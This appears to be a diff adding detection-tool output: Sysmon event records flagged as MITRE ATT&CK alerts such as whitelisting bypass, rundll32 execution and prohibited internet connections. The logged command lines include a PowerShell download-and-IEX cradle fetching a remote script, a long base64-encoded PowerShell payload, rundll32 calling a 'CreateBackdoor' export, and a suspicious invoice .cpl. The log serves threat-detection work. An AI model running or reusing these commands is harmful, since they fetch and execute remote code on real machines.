+ 2019-07-29 21:33:23.170
+ 747F3D96-6623-5D3F-0000-001011F68700
+ 5816
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7..home and IP ( 10.0.2.15 ) to hostname ( aka105.inwitelecom.net ) , IP ( 105.73.6.105 ) and port ( 80 )",3,"
+
+
+
+
+ 3
+ 5
+ 4
+ 3
+ 0
+ 0x8000000000000000
+
+
+ 4132
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-21 06:58:40.721
+ 365ABB72-1A29-5CE4-0000-001079F92101
+ 2432
+ C:\Windows\System32\mshta.exe
+ IEWIN7\IEUser
+ tcp
+ true
+ false
+ 10.0.2.15
+ IEWIN7..home
+ 49705
+
+ false
+ 105.73.6.105
+ aka105.inwitelecom.net
+ 80
+ http
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 1019
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-23 17:26:09.417
+ 365ABB72-D7B1-5CE6-0000-00102CD76D00
+ 2240
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\cmd.exe"
+ D:\
+ IEWIN7\IEUser
+ 365ABB72-CE6C-5CE6-0000-002047F30000
+ 0xf347
+ 1
+ High
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-D7B0-5CE6-0000-001077C56D00
+ 3388
+ \\vboxsrv\HTools\msxsl.exe
+ msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1557668164.122498,2019-05-12T17:36:04.122498+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16392
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 13:33:59.727
+ 365ABB72-20C7-5CD8-0000-001021022500
+ 1416
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe
+ c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
+ IEWIN7\IEUser
+ 365ABB72-1596-5CD8-0000-0020103A0100
+ 0x13a10
+ 1
+ High
+ SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-2006-5CD8-0000-0010E0912300
+ 2936
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557668164.122498,2019-05-12T17:36:04.122498+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16392
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 13:33:59.727
+ 365ABB72-20C7-5CD8-0000-001021022500
+ 1416
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe
+ c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
+ IEWIN7\IEUser
+ 365ABB72-1596-5CD8-0000-0020103A0100
+ 0x13a10
+ 1
+ High
+ SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-2006-5CD8-0000-0010E0912300
+ 2936
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1557668164.122498,2019-05-12T17:36:04.122498+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16392
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 13:33:59.727
+ 365ABB72-20C7-5CD8-0000-001021022500
+ 1416
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe
+ c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
+ IEWIN7\IEUser
+ 365ABB72-1596-5CD8-0000-0020103A0100
+ 0x13a10
+ 1
+ High
+ SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-2006-5CD8-0000-0010E0912300
+ 2936
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1557681649.458113,2019-05-12T21:20:49.458113+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16513
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 17:20:49.261
+ 365ABB72-55F1-5CD8-0000-0010781C3300
+ 2392
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe
+ C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
+ IEWIN7\IEUser
+ 365ABB72-4FB5-5CD8-0000-0020F2350100
+ 0x135f2
+ 1
+ Medium
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-55F1-5CD8-0000-00108A153300
+ 3668
+ C:\Windows\System32\ftp.exe
+ "C:\Windows\System32\ftp.exe" -s:c:\users\ieuser\appdata\local\temp\ftp.txt
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920559.063277,2019-05-27T05:29:19.063277+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5946
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:19.023
+ 365ABB72-3D6F-5CEB-0000-0010A6B1FF00
+ 1508
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1564434679.45431,2019-07-30T01:11:19.454310+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl",)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4864
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:11:17.503
+ 747F3D96-60F5-5D3F-0000-0010A8D75500
+ 4884
+ C:\Windows\SysWOW64\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl",
+ C:\Users\IEUser\Downloads\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-0020B5314100
+ 0x4131b5
+ 1
+ Medium
+ SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
+ 747F3D96-60F5-5D3F-0000-0010D1CF5500
+ 4356
+ C:\Windows\System32\rundll32.exe
+ "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl",
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564434679.45431,2019-07-30T01:11:19.454310+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl", )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4864
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:11:17.503
+ 747F3D96-60F5-5D3F-0000-0010A8D75500
+ 4884
+ C:\Windows\SysWOW64\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl",
+ C:\Users\IEUser\Downloads\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-0020B5314100
+ 0x4131b5
+ 1
+ Medium
+ SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
+ 747F3D96-60F5-5D3F-0000-0010D1CF5500
+ 4356
+ C:\Windows\System32\rundll32.exe
+ "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl",
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1564434679.45431,2019-07-30T01:11:19.454310+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl", )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4864
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:11:17.503
+ 747F3D96-60F5-5D3F-0000-0010A8D75500
+ 4884
+ C:\Windows\SysWOW64\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl",
+ C:\Users\IEUser\Downloads\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-0020B5314100
+ 0x4131b5
+ 1
+ Medium
+ SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
+ 747F3D96-60F5-5D3F-0000-0010D1CF5500
+ 4356
+ C:\Windows\System32\rundll32.exe
+ "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl",
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1558452781.141798,2019-05-21T19:33:01.141798+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7..home and IP ( 10.0.2.15 ) to hostname ( aka112.inwitelecom.net ) , IP ( 105.73.6.112 ) and port ( 80 )",3,"
+
+
+
+
+ 3
+ 5
+ 4
+ 3
+ 0
+ 0x8000000000000000
+
+
+ 4131
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-21 06:58:40.518
+ 365ABB72-1A29-5CE4-0000-001079F92101
+ 2432
+ C:\Windows\System32\mshta.exe
+ IEWIN7\IEUser
+ tcp
+ true
+ false
+ 10.0.2.15
+ IEWIN7..home
+ 49704
+
+ false
+ 105.73.6.112
+ aka112.inwitelecom.net
+ 80
+ http
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1584766825.192553,2020-03-21T09:00:25.192553+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243532
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:24.985
+ 747F3D96-9F68-5E75-0000-001079652000
+ 3300
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.192553,2020-03-21T09:00:25.192553+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243532
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:24.985
+ 747F3D96-9F68-5E75-0000-001079652000
+ 3300
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1584766825.192553,2020-03-21T09:00:25.192553+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243532
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:24.985
+ 747F3D96-9F68-5E75-0000-001079652000
+ 3300
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1557668039.743077,2019-05-12T17:33:59.743077+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe url.dll,FileProtocolHandler calc.exe)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16391
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 13:33:37.063
+ 365ABB72-20B1-5CD8-0000-001064D62400
+ 1844
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ rundll32.exe url.dll,FileProtocolHandler calc.exe
+ c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
+ IEWIN7\IEUser
+ 365ABB72-1596-5CD8-0000-0020103A0100
+ 0x13a10
+ 1
+ High
+ SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-2006-5CD8-0000-0010E0912300
+ 2936
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557668039.743077,2019-05-12T17:33:59.743077+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler calc.exe )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16391
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 13:33:37.063
+ 365ABB72-20B1-5CD8-0000-001064D62400
+ 1844
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ rundll32.exe url.dll,FileProtocolHandler calc.exe
+ c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
+ IEWIN7\IEUser
+ 365ABB72-1596-5CD8-0000-0020103A0100
+ 0x13a10
+ 1
+ High
